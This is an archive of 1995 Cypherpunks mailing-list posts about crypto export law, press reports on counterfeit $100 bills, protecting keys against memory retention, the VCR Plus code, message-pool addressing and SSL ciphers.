To: liberty@gate.net (Jim Ray)
Subject: Re: Wearing RSA shirt to school
In-Reply-To: <199509041203.IAA38469@tequesta.gate.net>
Message-ID: <199509050515.XAA08896@nag.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Note failed signature.  Great Dave Barry quote, by the way.  :-)


Bryce


******* rest of message is file included by Bryce

- -----BEGIN PGP SIGNED MESSAGE-----

Tim wrote:

<snips throughout>

>At 4:43 AM 9/4/95, Futplex wrote:
>>I wrote:
>>> With respect to possession within the U.S., there aren't any
>>> laws stopping you from waving strong cryptography around wherever you lik
    > e
>>> (at least, not yet).
>>
>>----
>>...and in private email, Jim Ray pointed out that showing the shirt to a
>>foreign national might technically violate ITAR...
>
>Nope, no more so than letting a foreign national read Schneier's book is a
>violation of the ITAR. If you dispute this, ask whether Schneier's book is
>banned from export (the book, not the optional diskette). It isn't. Nor are
>other cryptography _books_ banned from export.

The law doesn't have to be consistent, or to make sense, or be
enforced evenhandedly. The law is, after all, not written, or
interpreted, or enforced, by partisan Libertarians like me.
My private email to Futplex said *may* violate... and I stand
by it. [IANAL, though.] Whether or not a law as incontrovertably
stupid as ITAR is enforced may depend on the timing of the next
election, as we seem to be witnessing in the limbo-state of PRZ.

>I'm not minimizing the issue of export of machine-readable code, as in
>diskettes. But to claim that a blurry, printed on cotton "barcode" is even
>remotely in the same class as exporting a workable set of cryptographic
>system routines, or that letting a furriner merely "gaze upon" this blurry
>barcode, is a violation of the ITARs is laughable.

Yes, but *many* laws are laughable.

>>Yeah, I suppose I overstated it a bit. It appears that if the ITAR do cover
>>the shirt (unclear at present, AFAIK -- any news on the CJR, Raph ?), then
>>flashing it at a furriner could constitute a violation. Thanks for the
>>correction.

Actually, it was less a correction than me pointing out (yet another)
note of uncertainty. James Madison, in Federalist #62 said it best:

"What indeed are all the repealing, explaining, and amending laws, which
fill and disgrace our voluminous codes, but so many monuments of deficient
wisdom." 

Now, many of us would be more than satisfied to get back to that level of
government. I suggest that everyone go have a look at the entire Code of
Federal Regulations, before the next election. <g>

>the original questioner need not fret about his son wearing the
>>shirt to school.

I agree that wearing it through Customs on the way to Jamaica would
be more problematic, but I live next to a US Customs agent, and he
learned about ITAR from me. Here in Miami, Customs has plenty to
think about with the various (occasionally venomous) inbound cargo.

>It was this series of posts about whether wearing the "munitions t-shirt"
>near schools was a crime or not that made me think the silly season had
>arrived.

It has, a long time ago. Ever watch C-SPAN?
JMR


- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

iQCVAwUBMEro1W1lp8bpvW01AQHKsgP/bhOcCUoksLvbGe/nAKxDqZU8KvibvRFm
nQ++Xy3FjDDJrFg1/lgmivtrriuFK/xg4CvKdu+yQ6zJ72pH+92cLivsfHeg+ljZ
MPSXfHftaOP7i1e4KajnlC3jBcYbWQnqZRdduIyPXZnfn5xK5bU99c5oceCABtSx
UD/Hp9Poqbc=
=7tMD
- -----END PGP SIGNATURE-----
Regards, Jim Ray

See, when the GOVERNMENT spends money, it creates jobs; whereas 
when the money is left in the hands of TAXPAYERS, God only knows 
what they do with it.  Bake it into pies, probably.  Anything to 
avoid creating jobs.  -- Dave Barry
- ------------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35  James M. Ray  <liberty@gate.net>
- ------------------------------------------------------------------------
Support Phil! email zldf@clark.net or see http://www.netresponse.com/zldf
________________________________________________________________________



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta3

iQCVAwUBMEvc4vWZSllhfG25AQHtewP/YYdT/kcDZOtykQnKKU6OTcas006ft/dq
nB76g1DBJqNzyZj4UHE+AVoMZ61wCMXHUwjipTwfXHMYwJ5ystJQ9LbPUgMIb1kx
GNyZua7VJwvaGO2+M0FCzBopoQs2MavegxPdAPaxquZJWlB1KesbLkNoUWIF4St6
XtxP4EcVec4=
=1bvR
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Mon, 4 Sep 95 20:44:48 PDT
To: cypherpunks@toad.com
Subject: Forgery, bills, and the Four Horsemen  (Articles and Comment)
Message-ID: <Pine.SUN.3.91.950904234136.7378C-100000@access2.digex.net>
MIME-Version: 1.0
Content-Type: text/plain




I have received a pile of requests for citations
Here are segments of a few.  As I typed them all by hand, errors 
are likely to be mine.

My comments follow the articles, so you can stop reading just before them :)


###The San Francisco Examiner
March 7, 1995  - Tuesday

Global Counterfeiting traced to Tehran

[...]

For the past five years, so called superbills, crisp $100 Federal 
Reserve Notes, so perfectly forged that they might be fresh off 
U.S. government printing presses, have been flooding banks and 
money markets around the world.  The total amount currently in 
circulation is believe to be $10 Billion or more.

Currency officials alarmed.

Alarmed Treasury and Federal Reserve Board officials fear the 
increasing number of such superbills has shaken international 
confidence in America's currency.

[...]

From the moment the new superbills surfaced in 1989, it was clear 
to the secret service... that these were no ordinary forgeries.  
Under microscopic examination, they showed only infinitesimal 
differences from legitimate notes.  Most significant, the 
counterfeits had been printed on presses virtually identical to 
those used at the Bureau of Engraving and Printing.

Secret service investigators concentrated on those nations that 
had acquired the same kind of intagilo presses.  Only two 
companies sold them on the international market.  One was a U.S. 
company, none of whose overseas customers was considered suspect.  
The second was a Swiss company, De La Rue Giori.

Evidence pointed to Iran

By the end of 1991, investigators had eliminated all but one of 
Giori's clients: the Islamic Republic of Iran.

[...]

Intelligence agencies uncovered evidence that Iran was not only 
mass-producing the notes, but had built a world-wide distribution 
network.  Key transshipment points had been established in 
Lebanon, Syria, Sudan, and North Korea.

Ronald de Valderano of Britain's Research Foundation for the Study 
of Terrorism says practically every Iranian-backed terrorist cell 
in the world is at least partially supported by the forgeries.  
The notes most often are used to buy arms or pay operating 
expenses or are sold on the currency black markets for legal cash.  
Indeed, when FBI agents searched the residence of suspects 
arrested for the bombing of New York's World Trade center, they 
found $20,000 of the forgeries.

[...]

Critics have for years urged that U.S. currency be better 
protected against such onslaughts.  Last July, the treasury 
finally announced that changed were planned for U.S. currency, 
including covert security features.

[...]



###The Independent
June 19, 1995 - Monday

'Perfect dollar forgeries flood Middle East; The Israeli and 
Iranian governments top the list of suspects behind the faultless 
$100 bills.

Robert Fisk

The Lebanese know how to spot a fake.  Fake weapons, fake 
perfumes, fake diplomatic consuls, fake money.  But the latest US 
$100 bills are a near perfect forgeries as they have seen, many of 
them accepted happily by Beirut's notoriously suspicious money 
changers.

[...]

The bills, dated 1988 but probably forged in Lebanon in the 
following two years - the last two years of the civil war - are 
still arriving at the Allied Business Bank at the rate of one a 
month, often brought in from Cyprus or other Middle East states by 
Arab clients unaware that they are forged.

[Laws of most middle eastern countries make perfect forgeries a 
capital crime]

"Anyone who makes a 'perfect' dollar bill out here is going to get 
strung up if he's caught," another bank official said.  "So the 
guys who're going to make a perfect note, without any mistakes, 
are working for a government who will protect them.  So a 
government must be involved, the intelligence services, 
ministries, the lot."

A senior bank official in Lebanon believed that Iran or Israel 
might be responsible.  "When you're producing this kind of high-
tech stuff, it's got to have official backing," he said.  "If 
you're spending this kind of money on a 'perfect' forgery, it's 
for big business - for political parties, arms purchases, for 
paying militias."

He repeated a rumour believed by several other banking officials 
in Lebanon - that the "perfect" dollars might be coming off 
counterfeit presses and dollar plates taken into Afghanistan by 
the Soviet intelligence service during the Soviet occupation; 
Afghanistan is now divided among militias respectively funded by 
Saudi Arabia and Iran.

[...]

"The security thread is the reason why we are alarmed," the senior 
Lebanese bank official said of the new forgeries.  "It's not easy 
to get the thread in.  You put in the thread when you produce the 
note - it's not printed on, it's embedded in the paper.  And it's 
a real security thread.

"We suspect they're being exported to a variety of places: to the 
US, to the former Soviet Union...."

Other bank officials suspect Iran... and suggest that Tehran has 
used fake currency bills to fund the Hizbollah, Hamas and other 
armed groups which are opposed to Israeli occupation.



###The Washington Post
May 05, 1995 - Friday, Final edition

Bogus Bills?;  Rumors Persist That Iran Is Counterfeiting U.S. 
Currency to Sabotage the Economy.

Thomas. W. Lippman

[...]

The allegation that Iran is waging economic warfare against the 
United States by printing and distributing millions of dollars in 
phony U.S. currency has been circulating on Capitol Hill at least 
since 1992, when it was made by a House Republican Task Force on 
Terrorism and Unconventional Warfare.

It might even be true or partly true, according to some sources.  
There is a problem with counterfeit greenbacks around the world, 
these sources said.  It's just not clear that Iran is responsible 
for it.

The question arose again Tuesday when the irrepressible Rep. Dana 
Rohrabacher (R-Calif.) asked Assistant Secretary of State Robert 
Pelletreau about it in an International Relations Committee 
hearing on the Clinton administration's economic boycott of Iran.

Rohrabacher, who spend much of the recent congressional recess 
traveling in Asia, said he heard about the phony money from many 
people.  "Have you received and credible reports that the Iranians 
are counterfeiting American money" he asked.

Pelletreau, a normally unflappable career diplomat, looked 
uncomfortable.

"I know there is an intense investigation and campaign underway, 
led by the U.S. Secret Service to uncover all the sources of 
counterfeiting of American money abroad," he said.  "I just am 
personally not in a position to give you the exact details of what 
we believe Iranian involvement is in that."

"There are many leaders throughout the world... who believe that 
the American currency is being undermined by an intentional act of 
economic warfare on the part of the Iranian government... by 
counterfeiting billions of dollars' worth of U.S. currency," 
Rohrabacher said.  "Am I getting you right that basically you're 
not denying that this is going on?"

"I am not denying it," Pelletreau said.  The 1992 GOP report said 
the fake currency is being printed in the Iranian mint in Tehran, 
"using equipment and know-how purchased from the U.S. during the 
reign of the Shah," which ended in 1979....  A Wall Street Journal 
report at the time said that the phony bills-- whoever was making 
them-- were so good they could fool sophisticated currency-
handling equipment at the Federal Reserve.



###Counterfeiting and Money Laundering Deterrence act of 1995
Patrick Leahy

I rise today to introduce the Counterfeiting and Money laundering 
Deterrence Act of 1995.

[...]

A number of analysts believe the threat to the U.S. currency is 
urgent. News reports say that intelligence experts in the U.S. and 
Israel are aware of a highly skilled group of counterfeiter 
operating out of Lebanon's Bekaa Valley.  The counterfeiters, 
controlled by Syria and Iran, have turned out as much as $1 
billion of the extremely high-quality reproductions of the U.S. 
$100 bill.

[...]

First, the bills requires all existing $100 denomination U.S. 
currency to be exchanged within a 6-month period.  This would make 
drug traffickers who hoard vast amounts of hard currency hard-
pressed to convert their existing cash into the new money.  If 
they cannot exchange their funds in the specified time frame, 
their funds are worthless under the bill.

[...]

Second, the bill established two new versions of the $100 bill: 
one for use at home and one for use abroad.  The only business 
that relies on exporting large amounts of hard currency is drug 
trafficking.  This provision would make money smuggled out of the 
United States worthless, turning the tables on drug traffickers 
who covertly move money from the streets of this country to 
foreign bankers who launder it without reporting illicit 
transaction to the Treasury.

A U.S. citizen traveling abroad who wished to bring $100 currency 
with him would hardly be inconvenienced by this measure: a quick 
stop at a U.S. bank to convert their greenbacks into differently-
colored foreign-use bills would be all that is necessary-- just 
like purchasing travelers, checks.  The only ones who would be 
inconvienced would be drug traffickers who would hate to exchange 
their greenbacks for foreign use currency at a U.S. bank because 
of currency transaction reporting requirements.

[...]


### END ARTICLES



The presence of counterfeit bills, the legislation to defeat them, 
and the general sentiment of government in the matter is 
disturbing for a few reasons.

1.  Focus on Surveillance

The legislation adopted to defeat counterfeiting is linked with 
the four horsemen quite closely.  The solution, instead of making 
the bills difficult to forge like they should have been in the 
first place (U.S. bills are currently the easiest to forge of 
western nations- and counterfeit bills are long lived as currency 
changes are unheard of in the U.S.) is to create a regime where an 
additional tier of reporting is required.  It seems the first 
answer to every "problem" (read: every element which might allow 
citizen autonomy) now is to link it to money laundering and 
terrorism and drop a blanket solution over it which without fail 
includes highlevel reporting or tracking elements.  (Anyone seen 
this before with the... oh, I dunno, strong encryption issue?)

2.  The demonization of cash.

I have written here before on the increasing difficulty with which 
one uses cash without suspicion in the United States.  It has come 
to the point where money, in any amount, won't buy you everything 
anymore.  Many products and services are available ONLY by credit 
or credit card- and by extension, available only to traceable 
transactions.  Is it any wonder Americans have one of the lowest 
ratios of income to debt in the world today?  "They" would have 
you believe that cash is nothing but a tool for the four horsemen.  
I am most disturbed in this context by the way the act is 
financed- i.e. by the extinguished obligations from unexchanged 
currency.  Does this measure sound ominous to anyone but me?

3.  The corruption of e-cash to further the above.

If the government is disturbed by the laundering of money enough 
to actually print, or even propose printing, two kinds of 
currency, how will they respond to untraceable, unaccountable and 
infinitely liquid e-cash?  I think the answer is in past behavior:  
e-cash will be linked to the four horsemen and subjected to 
rigorous reporting requirements- systems which are true e-cash 
will be banned.  At the same time the widespread presence and use 
of e-cash will be used to question anyone who uses physical 
currency.  The death of cash continues as it were.  Why would 
anyone carry bills anymore when a plastic smartcard (or your 
highschool ring) is so much more convenient?  You must have 
something to hide.  No, good citizen units will WANT to use "e-
cash" because they are honest, and know the government means them 
no harm and is here to protect them from the four horsemen.


The cash is dead, long live the king.



00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est
E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!
*New Key Information*    -    Finger for key revocation and latest key update.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Mon, 4 Sep 95 21:01:44 PDT
To: Jeff Simmons <jsimmons@goblin.punk.net>
Subject: Re: NSA says Joe Sixpack won't buy crypto
In-Reply-To: <199509050348.UAA19868@goblin.punk.net>
Message-ID: <Pine.SUN.3.91.950904235841.8362A-100000@access2.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 4 Sep 1995, Jeff Simmons wrote:

> Date: Mon, 4 Sep 1995 20:48:51 -0700 (PDT)
> From: Jeff Simmons <jsimmons@goblin.punk.net>
> To: cypherpunks@toad.com
> Subject: Re: NSA says Joe Sixpack won't buy crypto
> 
> Here's a prediction:  within one year, we will see the advent of Micro$oft's
> "Not So Bad Privacy".  It'll be a secret algorithm with either GAK done by
> Micro$oft itself, or a flat-out trap door.  ANY communications with a 
> Windoze box or network will have to use it, or loose the market.


It's here already.
It's called "lotus notes."


> About the
> same time, Justice will suddenly 'loose interest' in its various 
> investigations of M$.  Micro$oft will probably give it away for free as part
> of the Windows 95.702 upgrade. 

Wait a few months.  Justice is boring of the investigation even now.

> -- 
> Jeff Simmons                           jsimmons@goblin.punk.net
> 


---
00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est
E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!
*New Key Information*    -    Finger for key revocation and latest key update.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy L. Nali" <tn0s+@andrew.cmu.edu>
Date: Mon, 4 Sep 95 21:31:28 PDT
To: cypherpunks@toad.com
Subject: Re: Emergency File Wipe Algorithim
In-Reply-To: <8B074DD.00030003EA.uuout@famend.com>
Message-ID: <QkGx9vW00iV2Q5kEEr@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 4-Sep-95 Re: Emergency File Wipe
Alg.. by MONTY HARDER@famend.com 
> CW> and relaxation are in the same order of magnitude.  Thus, a few
microsecon
> ds of
> CW> storing the opposite data to the currently stored value will have
little e
> ffect
> CW> on the oxide.  Ideally, the oxide should be exposed to as much
stress at t
> he
>  
>   Here is a simple way to handle the problem, using our old discredited
> friend, XOR. Set up your software to periodically XOR the key with FFFF.
> This way, each bit will be a 0 half the time, and a 1 the other half.
> You have a flag that tells whether the key is in normal or inverted
> form, so that you can quickly perform any necessary computations on it,
> but there should not be any long-term memory effect.
>  
>  

    On today's machines, it's a little more complicated than that. 
After you XOR the key, you have to then flush all the cache lines that
contain the key, to make sure that the XOR operation makes it to the
main memory.  Unless I'm mistaken, a write-back cache will not propogate
the XOR operation to main memory unless another memory operation(s)
forces bumps the XORed key out of cache memory.  Successive XOR
operations on the key won't necessarily do this; you need some other
memory op to flush the cache lines.

    

_____________________________________________________________________________
 
 Tim Nali            \  "We are the music makers, and we are the dreamers of
 tn0s@andrew.cmu.edu  \   the dreams" -Willy Wonka and the Chocolate Factory






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Thu, 7 Sep 95 09:15:36 PDT
To: Black Unicorn <unicorn@access.digex.net>
Subject: Re: NSA says Joe Sixpack won't buy crypto
In-Reply-To: <Pine.SUN.3.91.950904235841.8362A-100000@access2.digex.net>
Message-ID: <Pine.D-G.3.91.950905004357.26392B-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 5 Sep 1995, Black Unicorn wrote:

> On Mon, 4 Sep 1995, Jeff Simmons wrote:
> 
> > 
> > Here's a prediction:  within one year, we will see the advent of Micro$oft's
> > "Not So Bad Privacy".  It'll be a secret algorithm with either GAK done by
> > Micro$oft itself, or a flat-out trap door.  ANY communications with a 
> > Windoze box or network will have to use it, or loose the market.
> 
> 
> It's here already.
> It's called "lotus notes."
> 
> 
> > About the
> > same time, Justice will suddenly 'loose interest' in its various 
> > investigations of M$.  Micro$oft will probably give it away for free as part
> > of the Windows 95.702 upgrade. 
> 
> Wait a few months.  Justice is boring of the investigation even now.

I hope this doesn't mean the Department is switching to Microsoft Word! :-)
(In fact, we're about to go to WP6.0 for Windows.  And the 6.0 is not a 
typo.)


 
> > -- 
> > Jeff Simmons                           jsimmons@goblin.punk.net

EBD




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dr261@cleveland.Freenet.Edu (Tobin T Fricke)
Date: Tue, 5 Sep 95 00:01:46 PDT
To: cypherpunks@toad.com
Subject: Re: article/author ratings/reputations (was Re: pseudonyms & list health)
Message-ID: <199509050701.DAA15561@kanga.INS.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


This idea of "ratings" over usenet is very interesting..  If anyone
has addittional info or URLs where I can look, please send me
"private" mail at dr261@cleveland.freenet.  (Or post them to the
list, but it doesn't seem crypto-related.)
Thanks.

--
Tobin Fricke (aka LightRay)       The Digital Forest BBS (714)586-6142
dr261@kanga.ins.cwru.edu          KE6WHF Amateur Radio, 1:103/925 fido




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Tue, 5 Sep 95 00:54:29 PDT
To: sdw@lig.net (Stephen D. Williams)
Subject: Re: VCRPLUS Huffman code
Message-ID: <v02130510ac71a8536690@[166.84.254.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 20:06 9/4/95, Stephen D. Williams wrote:
>It was broken, and I might have the reference in my archives...
>
>If I get time I'll find it.

Why not just do the simple thing and look at Gemstar Development
Corporation's Patent for the details <g>.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 5 Sep 95 09:46:15 PDT
To: <cypherpunks@toad.com>
Subject: "This discussion is off-topic, please take it elsewhere"
Message-ID: <ac71c5aa03021004a06d@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:58 AM 9/5/95, Sandy Sandfort wrote:
>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>                          SANDY SANDFORT
> . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
>
>C'punks,
>
>This is not a crypto post, but those interested in threat models
>and counter-measures might want to read on.

This brings up an important issue. Sorry it is not written in C, or even TCL.

I actually agree with a point the noted tentacle VZNuri ("visionary,"
obviously) wrote, namely, that people are getting entirely too apologetic
(myself included, though most of my "apologies" have had an ironic edge to
them) about posting things that are other than about coding in C, writing
sockets for Windows, or breaking SSL.

Folks, this list is about a _lot more_ than just some facet of writing
software. It started as a wide-ranging list, with many topics, many
interests. I don't think I need to try to list the topics, but they
obviously include things such as legal issues, policy, PGP, remailers,
digital money, money laundering, regulatory arbitrage, data havens,
steganography, languages, frameworks, Unix utilities, and dozens of other
related topics. We've covered hundreds of topics, and are probably the only
such list on the planet that routinely considers the ramifications and ways
of actually building the exciting ideas that the academics at the Crypto
conferences discover and write about.

(I can tell you that one of the main motivations we (Eric and I) had in
starting the group was to take the academic abstractions, things like "bit
commitment" and "dining cryptographers networks" and reify them into actual
blocks of code, or running programs.)

Some have argued that "Cypherpunks write code," which has been a short
slogan making it clear that one of our main interests is in actually
building and deploying these methods. This was a major goal in the spring
of 1992 when Eric (Hughes, for any newcomers) and I spent time hashing out
what is needed in crypto.

As far as I'm concerned, we're on track. Remailers have advanced far beyond
the early remailers, and that they exist at all is an accomplishment. The
"theory" of remailers is immensely accelerated by having actual remailers
in actual use to test theories against and to see real world behaviors.

Likewise, message pools have been built. A working anonymous market
(BlackNet, for example) has been instantiated, albeit not proliferated.
Digital money in various forms (Magic Money, work with Chaum's DigiCash,
etc.) has been used.

Lots of other examples. PGP, hooks to mail programs (though a lot more are
needed), key escrow considerations, etc.

Of course, things have gone more slowly in some areas than in others.
Digital money, and financial instruments in general, have proceeded in fits
and starts. I suspect this indicates that things like money are not done
lightly, and that many non-coding issues are intertwined in such a way as
to make any "amateur" efforts problematic. But it's only through trying
that the obstacles can be seen, so even our failures are useful.

Is this "writing code" in all cases? Of course not. Not everything is
coding. Planning and preparing is just as important. And consideration of
threat models is part and parcel of writing code, else one will not know
where to start writing code. Thus, for example, the hundreds of posts here
on key escrow (and some of us anticipated Clipper six months before it was
announced, allowing the Cypherpunks to hit the ground running as soon as it
was announced) and GAK are useful in countering the arguments of those who
have spent years planning such escrow (GAK) policies.

What I'm getting at is that the "Cypherpunks write code" mantra does not
mean that _only_ the few dozen folks actively writing C code can
contribute. Indeed, many of the folks now writing code have _claimed_ that
they were inspired to write some code in some area--remailers, digital
cash, SSL challenges, whatever--by the discussions here on this list.

Would they have been so inspired if all political, legal, and cultural
discussions had been expunged, if only the arcania of programming and C
were being discussed? After all, sci.crypt already exists, and even
sci.crypt.research, so why should the Cypherpunks list even exist, as these
groups are already ostensibly focussed on pure crypto issues.

No, Cypherpunks is about more than just C programming, about more than just
IETF issues, about more than just algorithms.

I think it great that so much programming discussion occurs, that so much
progress is being made. I just think some list.cops are going a bit
overboard in their denunciations of "off-topic" posts, and their increasing
shrillness in saying that anyone not out there writing Unix crypto programs
should stop posting.

Those who only want to read about "malloc" and "struct" are encouraged to
use the filtering tools which they surely have access to and to stop
telling us in shrill voices that posts are "off-topic."

--Tim May


---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 5 Sep 95 10:02:53 PDT
To: cypherpunks@toad.com
Subject: Re: SUMMARY: Not-so-volatile volatile memory
Message-ID: <ac71ceef04021004ce0a@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:54 AM 9/5/95, Anonymous wrote:
>> -- Summary: Data retention in semiconductor memory --
>>
>> Contrary to conventional wisdom, "volatile" semiconductor memory
>> does not entirely lose its contents when power is removed.  Both
>> static (SRAM) and dynamic (DRAM) memory retain some information on
>> the data stored in it while power was still applied.  SRAM is
>> particularly susceptible to this problem, as storing the same data
>> in it over a long period of time has the effect of altering the
>> preferred power-up state to the state which was stored when power
>> was removed.  Older SRAM chips could often "remember" the previously
>> held state for several days.  In fact, it is possible to manufacture
>> SRAM's which always have a certain state on power-up, but which can
>> be overwritten later on - a kind of "writeable ROM".
>
>Is this a new discovery?  When I used to work with DOD classified
>data, not so long ago, disk drives had to be declassified using an
>approved program, such as Norton Utilities' "WIPEINFO".  (That was
>approved up through the SECRET/SAR level, anyway.  I don't know
>about TS/SCI/SI.)  But those same regulations said that RAM was
>considered declassified within a certain time (30 seconds, I think)
>after power was removed.  (That time figure was UNclassified, BTW.)
>I think it was just to allow time for the voltage to bleed off of
>the power supply's filter capacitors, and not related to the
>relative volatility of DRAM.

The Gutman article was discussing residual/remnant storage a lot more
subtle than the usual "bleed-off" charateristics.

One interesting twist is using radiation sources to "snapshot" or "freeze"
the internal contents of dynamic RAM.

I worked with DRAMs for more than a decade at Intel, though never on this
particular issue. But I read a lot of the public papers on radiation
effects on DRAMS, including the "freezing" of data patterns into DRAMs by
exposure.

(I recall thinking at the time, circa 1980, that someday raids on computers
could involve bringing in flash radiation sources to "snapshot" the
contents of DRAM.)

Sandia Labs did a lot of the work on  this, and results are reported at the
annual Nuclear and Space Radiation Effects Conference. The December issue
of "IEEE Transactions on Nuclear Science" every year includes the
proceedings of this conference. Any large university library should have
it.

It's also possible to literally freeze a DRAM--with "Arctic Freeze" spray,
for example--and stop the self-discharge of DRAM cells.

I doubt any of these efforts are being used, though. Looking at how raided
computers are simply carted off in the backs of pickup trucks, with disk
drives thrown in with monitors, I suspect nothing this sophisticated has
ever been tried. Quantico might have some more sophisticated approaches,
but they're not publically discussing them.

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Tue, 5 Sep 95 10:33:28 PDT
To: hfinney@shell.portal.com
Subject: Re: Slightly faster checking for encrypted messages to me
Message-ID: <v02120d01ac72297cb133@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



Hal --

I've actually given this some thought in the past, and
the most practical solution IMHO is much lower tech, although it
only works on non-initial messages in a correspondence.

If two entities want to communicate via a message pool,
without worrying about traffic analysis, but don't want
the overhead of trying to decrypt every headerless
message to the pool, then they can do the following:

1) In a "headered" message, one of the entities (A) sends
   a collection of large random numbers to be used as return
   markers, encrypted with the public key of the desired
   correspondent (B).

2) B can then respond to A with an essentially headerless
   message prefixed with one of the numbers send by A.
   This initial message should contain a list of similar
   numbers for B, that A can use to send messages to B.

3) Numbers are only used once; entities can now quickly
   scan the message pool by hashing the initial N bits
   of each message into a lookup table seeded with all
   the remaining random return markers they've distributed.

4) As an extension, you can divide your message pools
   into "initial contact" pools, which would begin with
   headerless public key encrypted blocks, and "conversation"
   pools that would begin with return markers. (Of course
   this is trivially open to denial of service attacks.)

This is the basic principal behind the TA-resistant streams
over UDP stuff I wrote up for cypherpunks last spring, except
in that case a given server does the lookup first, and only
then tries to treat the header as a public key encrypted
block instead of a MAC.

The Rabin stuff is a step in the right direction for the long
term, however.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Tue, 5 Sep 95 07:35:31 PDT
To: cypherpunks@toad.com
Subject: Re: VCRPLUS Huffman code
Message-ID: <9509051435.AA15596@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



> Has anyone worked out the VCRPLUS code?

It was partially broken a few years ago, and the results published in
Cryptologia. I have a xerox in a carton somewhere. 

The break was for codes up to 4or 5 digits long, if I recall - this covers
most of the major timeslots on the main stations. Longer codes
cover odd timeslots on less popular stations.

Code which implemented this partial crack was published on the net,
and the VCR+ people got very upset about it - apparently they make
money selling the codes to TV Guide and newspapers. It's protected
as a trade secret, not a patent.

It used a combination of lookup tables and Huffman codes, and
included a certain amount of obfuscation to resist cracking.

Peter


Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Tue, 5 Sep 95 07:55:29 PDT
To: trei@process.com
Subject: Re: Non-US SSL128 site
In-Reply-To: <9509051446.AA16057@toad.com>
Message-ID: <199509051449.KAA13448@joplin.bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain



| Netscape sells a 128-bit US-only client for $39


	Does the US only server also do des, 3des and IDEA, or just
rc4-128?

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Tue, 5 Sep 95 07:46:52 PDT
To: cypherpunks@toad.com
Subject: Re: Non-US SSL128 site
Message-ID: <9509051446.AA16057@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> > a) Use 128 bit SSL if the client allows it.
> > b) Tell users which cipher is being used on a secure session.
 
> Netscape's press release on the RC4-40 crack seems to have disappeared from
> their home page, but I don't remember any specific mention of 128-bit
> U.S.-only clients, just servers.

> So what's up?

Netscape sells a 128-bit US-only client for $39

Peter

Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Barber <jeffb@sware.com>
Date: Tue, 5 Sep 95 08:12:35 PDT
To: adam@bwh.harvard.edu (Adam Shostack)
Subject: Re: Non-US SSL128 site
In-Reply-To: <199509051449.KAA13448@joplin.bwh.harvard.edu>
Message-ID: <9509051506.AA09665@wombat.sware.com>
MIME-Version: 1.0
Content-Type: text/plain


Adam Shostack writes:

> | Netscape sells a 128-bit US-only client for $39

> 	Does the US only server also do des, 3des and IDEA, or just
> rc4-128?

Yes.  It does:

    RC4 - 128
    RC4 - 40
    RC2 - 128
    RC2 - 40
    IDEA
    DES, "64 bits"
    DES "with EDE 3, 192 bits"


-- Jeff



